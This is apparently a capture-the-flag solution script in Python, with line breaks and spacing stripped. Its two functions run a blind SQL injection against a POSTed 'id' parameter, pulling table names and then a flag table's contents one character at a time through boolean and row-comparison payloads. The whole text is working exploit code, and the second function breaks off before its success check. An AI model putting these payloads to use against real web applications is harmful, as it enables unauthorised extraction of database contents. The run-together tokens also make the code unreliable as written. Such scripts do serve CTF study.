defexp1(): str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','') flag = '' select = 'select group_concat(table_name) from sys.x$schema_flattened_keys' for j inrange(1,40): for i in str1: paylaod = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i) #print(paylaod) data = { 'id': paylaod, } r = requests.post(url,data=data) if'Nu1L'in r.text: flag += i print(flag) break
defexp2(): str1 = ('-0123456789'+string.ascii_uppercase+string.ascii_lowercase+string.punctuation).replace("'","").replace('"','').replace('\\','') flag = '' flag_table_name = 'f1ag_1s_h3r3_hhhhh' for j inrange(1,39): for i in str1: i = flag+i paylaod = "1&&((select 1,concat('{}~',CAST('0' as json))) < (select * from {} limit 1))".format(i,flag_table_name) #print(paylaod) data = { 'id': paylaod, } r = requests.post(url,data=data)